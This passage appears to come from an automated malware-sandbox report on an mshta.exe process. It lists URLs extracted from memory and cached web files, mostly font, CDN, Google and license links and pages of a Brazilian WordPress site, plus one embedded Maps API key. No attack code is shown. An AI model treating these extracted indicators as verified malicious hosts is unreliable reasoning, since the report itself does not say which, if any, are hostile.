Source: mshta.exe, 00000008.00000002.1179252969.00000000065D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/AO
Source: mshta.exe, 00000008.00000002.1179252969.00000000065D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/EO
Source: mshta.exe, 00000008.00000002.1178363026.0000000006479000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u8w4BMUTPHh30AXC-u.eot
Source: mshta.exe, 00000008.00000003.956986857.00000000002C9000.00000004.00000020.00020000.00000000.sdmp, css[2].css.8.drString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u8w4BMUTPHh30AXC-u.eot);
Source: mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u8w4BMUTPHh30AXC-u.eot);s
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u8w4BMUTPHh30AXC-u.eot/modernizr.js?ver=2.0.6
Source: mshta.exe, 00000008.00000002.1178363026.0000000006479000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u8w4BMUTPHh30AXC-u.eotC:
Source: mshta.exe, 00000008.00000002.1178082381.0000000006430000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh50XSwiPHQ.eot
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh50XSwiPHQ.eot)
Source: mshta.exe, 00000008.00000003.957014217.00000000002F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.958503207.00000000002F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1165855199.00000000003B1000.00000004.00000020.00020000.00000000.sdmp, css[6].css.8.drString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh50XSwiPHQ.eot);
Source: mshta.exe, 00000008.00000002.1178082381.0000000006430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh50XSwiPHQ.eotC:
Source: mshta.exe, 00000008.00000002.1165855199.00000000003B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh50XSwiPHQ.eott177&
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh6UVSwiPHQ.eot
Source: mshta.exe, 00000008.00000003.957003648.00000000002E8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.958496440.00000000002E8000.00000004.00000020.00020000.00000000.sdmp, css[5].css.8.drString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh6UVSwiPHQ.eot);
Source: mshta.exe, 00000008.00000002.1178082381.0000000006430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh6UVSwiPHQ.eotC:
Source: mshta.exe, 00000008.00000002.1165855199.00000000003B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh6UVSwiPHQ.eotZUH2R%
Source: mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh7USSwiPHQ.eot
Source: mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.956992189.00000000002D3000.00000004.00000020.00020000.00000000.sdmp, css[3].css.8.drString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh7USSwiPHQ.eot);
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh7USSwiPHQ.eot.20
Source: mshta.exe, 00000008.00000002.1175277603.000000000528C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh7USSwiPHQ.eot;-ms-opacity:.55;0.6
Source: mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh7USSwiPHQ.eotC:
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh7USSwiPHQ.eotdeflate
Source: mshta.exe, 00000008.00000002.1178400402.000000000648A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6uyw4BMUTPHjx4wWg.eot
Source: mshta.exe, 00000008.00000003.956997265.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, css[4].css.8.dr, css[1].css.8.drString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6uyw4BMUTPHjx4wWg.eot);
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6uyw4BMUTPHjx4wWg.eot);(
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6uyw4BMUTPHjx4wWg.eot);e
Source: mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6uyw4BMUTPHjx4wWg.eot2
Source: mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fonts.gstatic.com/s/lato/v23/S6uyw4BMUTPHjx4wWg.eotC:
Source: mshta.exe, 00000008.00000002.1174702241.0000000005115000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g.co/dev/maps-no-account
Source: jquery.mobilemenu[1].js.8.drString found in binary or memory: http://github.com/mambows/mobilemenu
Source: style[1].css.8.drString found in binary or memory: http://info.template-help.com/help/
Source: jquery.mobilemenu[1].js.8.drString found in binary or memory: http://jquery.com
Source: mshta.exe, 00000008.00000003.939874043.000000000027F000.00000004.00000020.00020000.00000000.sdmp, font-awesome[1].css.8.drString found in binary or memory: http://kyruus.com
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://maps.googleapis.com/
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://maps.googleapis.com/dT
Source: mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://maps.googleapis.com/maps/api/js?v=3.exp&key=AIzaSyBXSoaDpFMSx5Mw41I7DfRd1h7fJUulK_0#038;ver=4
Source: mshta.exe, 00000008.00000002.1165538515.00000000002D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mt.googleapis.com/maps/vt/iconde
Source: mshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://netdna.bootstrapcdn.com/#
Source: mshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://netdna.bootstrapcdn.com/&
Source: mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1
Source: mshta.exe, 00000008.00000002.1165724575.000000000035E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1?ver=2.9.2
Source: mshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1A
Source: mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css?ver=3.2.1y~
Source: mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://netdna.bootstrapcdn.com/font-awesome/3.2.1/font/fontawesome-webfont.eot?v=3.2.1.NET4.0E)D
Source: mshta.exe, 00000008.00000002.1165911897.00000000003CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://netdna.bootstrapcdn.com/font-awesome/3.2.1/font/fontawesome-webfont.eot?v=3.2.1.NET4.0E)H
Source: mshta.exe, 00000008.00000002.1174702241.0000000005115000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, 00000008.00000002.1174702241.0000000005115000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, 00000008.00000002.1174702241.0000000005115000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, 00000008.00000002.1174702241.0000000005115000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174702241.0000000005115000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: mshta.exe, 00000008.00000002.1186574791.0000000009C8D000.00000004.00000020.00020000.00000000.sdmp, animate-logo[1].css.8.dr, jquery.jplayer.min[1].js.8.drString found in binary or memory: http://opensource.org/licenses/MIT
Source: mshta.exe, 00000008.00000003.939874043.000000000027F000.00000004.00000020.00020000.00000000.sdmp, font-awesome[1].css.8.drString found in binary or memory: http://opensource.org/licenses/mit-license.html
Source: mshta.exe, 00000008.00000002.1177049655.0000000005850000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1185390535.0000000009AD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.939874043.000000000027F000.00000004.00000020.00020000.00000000.sdmp, font-awesome[1].css.8.drString found in binary or memory: http://scripts.sil.org/OFL
Source: mshta.exe, 00000008.00000002.1165538515.00000000002D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://static.panoramio.com.storage.googleapis.com/photos/
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://storage.ie6countdown.com/
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://storage.ie6countdown.com/assets/100/images/banners/warning_bar_0000_us.jpg
Source: mshta.exe, 00000008.00000002.1170116041.00000000036FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://storage.ie6countdown.com/assets/100/images/banners/warning_bar_0000_us.jpg.0=1.7.2
Source: mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://translate.google.com/
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit2
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit2/jqV
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit2US
Source: mshta.exe, 00000008.00000002.1168275161.0000000002C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit2ip
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit2kV
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit2us~V
Source: mshta.exe, 00000008.00000003.939874043.000000000027F000.00000004.00000020.00020000.00000000.sdmp, font-awesome[1].css.8.drString found in binary or memory: http://twitter.com/byscuits
Source: mshta.exe, 00000008.00000003.939874043.000000000027F000.00000004.00000020.00020000.00000000.sdmp, font-awesome[1].css.8.drString found in binary or memory: http://twitter.com/fontawesome.
Source: responsive[1].css.8.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmp, bootstrap.min[1].js.8.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.txt
Source: mshta.exe, 00000008.00000002.1174702241.0000000005115000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.broofa.com
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174702241.0000000005115000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmp, jplayer.playlist.min[1].js.8.drString found in binary or memory: http://www.gnu.org/copyleft/gpl.html
Source: flexslider[1].css.8.drString found in binary or memory: http://www.gnu.org/licenses/gpl-2.0.html
Source: mshta.exe, 00000008.00000002.1186574791.0000000009C8D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmp, jquery.jplayer.min[1].js.8.dr, jplayer.playlist.min[1].js.8.drString found in binary or memory: http://www.jplayer.org
Source: mshta.exe, 00000008.00000002.1183487448.0000000008F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.macromedia.com
Source: mshta.exe, 00000008.00000002.1178082381.0000000006430000.00000004.00000020.00020000.00000000.sdmp, jquery.mousewheel.min[1].js.8.drString found in binary or memory: http://www.mathias-bank.de)
Source: mshta.exe, 00000008.00000002.1186574791.0000000009C8D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170215522.000000000372F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1178455659.000000000649E000.00000004.00000020.00020000.00000000.sdmp, camera.min[1].js.8.dr, swfobject[1].js.8.dr, jplayer.playlist.min[1].js.8.drString found in binary or memory: http://www.opensource.org/licenses/mit-license.php
Source: flexslider[1].css.8.drString found in binary or memory: http://www.woothemes.com/flexslider/
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
Source: mshta.exe, 00000008.00000002.1178455659.000000000649E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/(
Source: mshta.exe, 00000008.00000002.1178455659.000000000649E000.00000004.00000020.00020000.00000000.sdmp, owl.carousel[1].js.8.drString found in binary or memory: https://app.vzaar.com/videos/:id
Source: mshta.exe, 00000008.00000002.1165538515.00000000002D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cbks0.googleapis.com/cbk?fs.
Source: mshta.exe, 00000008.00000002.1165962567.00000000003F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/apps-themes
Source: mshta.exe, 00000008.00000002.1174702241.0000000005115000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/EventTarget/addEventListener
Source: mshta.exe, 00000008.00000002.1186220024.0000000009C0F000.00000004.00000020.00020000.00000000.sdmp, scripts[1].js.8.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/CustomEvent/CustomEvent
Source: mshta.exe, 00000008.00000002.1174702241.0000000005115000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.google.com/maps/documentation/javascript/error-messages#unsupported-browsers
Source: mshta.exe, 00000008.00000003.939879199.0000000000287000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174702241.0000000005115000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.google.com/maps/documentation/javascript/styling#cloud_tooling
Source: mshta.exe, 00000008.00000002.1174702241.0000000005115000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.google.com/maps/documentation/javascript/vector-map
Source: mshta.exe, 00000008.00000002.1178082381.0000000006430000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br
Source: mshta.exe, 00000008.00000002.1178455659.000000000649E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1184841994.0000000009A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/#about_section
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/#about_section.0.0
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/#contatos
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/#contatos9
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1184841994.0000000009A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/#estrutura
Source: mshta.exe, 00000008.00000002.1184841994.0000000009A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/#estruturaion
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/#estruturajs?ver=1.0.0
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/#portfolio_section
Source: mshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/#portfolio_section001.24
Source: mshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/#portfolio_section1.24
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/#segmentos
Source: mshta.exe, 00000008.00000002.1184841994.0000000009A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/#segmentosrce
Source: mshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1178400402.000000000648A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/#servicos
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/#servicosr
Source: mshta.exe, 00000008.00000002.1174663016.0000000005100000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/P/1.1.(
Source: mshta.exe, 00000008.00000002.1170116041.00000000036FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/comments/feed/
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/comments/feed/J
Source: mshta.exe, 00000008.00000002.1170116041.00000000036FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/feed/
Source: mshta.exe, 00000008.00000002.1170116041.00000000036FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1166014804.0000000000417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/feed/atom/
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/ig
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/on
Source: mshta.exe, 00000008.00000002.1167751704.0000000002B43000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1063601637.0000000002B43000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1184841994.0000000009A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/wp-admin/admin-ajax.php
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/wp-json/
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/wp-json/N
Source: mshta.exe, 00000008.00000002.1168302707.0000000002C86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/wp-json/contact-form-7/v1tom
Source: mshta.exe, 00000008.00000002.1184481099.00000000099AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://facextrade.com.br/xmlrpc.php?rsd
Source: mshta.exe, 00000008.00000002.1165538515.00000000002D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://geo0.ggpht.com/cbk
Source: mshta.exe, 00000008.00000002.1165538515.00000000002D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://geo1.ggpht.com/cbkn
Source: mshta.exe, 00000008.00000002.1165538515.00000000002D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://geo2.ggpht.com/cbk
Source: mshta.exe, 00000008.00000002.1165538515.00000000002D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://geo3.ggpht.com/cbkl
Source: mshta.exe, 00000008.00000002.1178455659.000000000649E000.00000004.00000020.00020000.00000000.sdmp, owl.theme.default.min[1].css.8.dr, owl.carousel.min[1].css.8.dr, owl.carousel[1].js.8.drString found in binary or memory: https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE
Source: mshta.exe, 00000008.00000002.1185420355.0000000009AF9000.00000004.00000020.00020000.00000000.sdmp, superfish[1].js.8.drString found in binary or memory: https://github.com/joeldbirch/onHoverIntent
Source: mshta.exe, 00000008.00000003.1037660895.000000000382A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1039017067.000000000382C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1038851345.000000000382B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170800574.000000000382D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/joeldbirch/onHoverIntent3
Source: animate-logo[1].css.8.drString found in binary or memory: https://github.com/nickpettit/glide
Source: jquery.simplr.smoothscroll.min[1].js.8.drString found in binary or memory: https://github.com/simov/simplr-smoothscroll
Source: mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gtranslate.io/
Source: mshta.exe, 00000008.00000002.1165538515.00000000002D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lh3.ggpht.com/e
Source: mshta.exe, 00000008.00000002.1165538515.00000000002D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lh4.ggpht.com/iH
Source: mshta.exe, 00000008.00000002.1165538515.00000000002D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lh5.ggpht.com/d
Source: mshta.exe, 00000008.00000002.1165538515.00000000002D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lh6.ggpht.com/s8
Source: mshta.exe, 00000008.00000002.1165538515.00000000002D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://maps.googleapis.com/maps/api/js/GeoPhotoService.SingleImageSearchprh
Source: mshta.exe, 00000008.00000002.1178455659.000000000649E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174934919.000000000517F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://maps.googleapis.com/maps/api/js?v=3.exp&sensor=false
Source: mshta.exe, 00000008.00000002.1178455659.000000000649E000.00000004.00000020.00020000.00000000.sdmp, owl.carousel[1].js.8.drString found in binary or memory: https://regexper.com/#(http%3A%7Chttps%3A%7C)%5C%2F%5C%2F(player.%7Cwww.%7Capp.)%3F(vimeo%5C.com%7Cy
Source: mshta.exe, 00000008.00000002.1167751704.0000000002B43000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1063601637.0000000002B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://s.w.org/images/core/emoji/11/svg/https://s.w.org/images/core/emoji/11/72x72/NatKL$:
Source: mshta.exe, 00000008.00000002.1174702241.0000000005115000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: mshta.exe, 00000008.00000002.1165538515.00000000002D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://streetviewpixels-pa.googleapis.com/v1/tiledP
Source: mshta.exe, 00000008.00000002.1174702241.0000000005115000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/fusiontables/answer/9185417).
Source: mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/HN
Source: mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/ON
Source: mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1167109385.00000000023AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit2
Source: mshta.exe, 00000008.00000002.1170501820.00000000037CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit29
Source: mshta.exe, 00000008.00000002.1170390251.0000000003783000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit2S
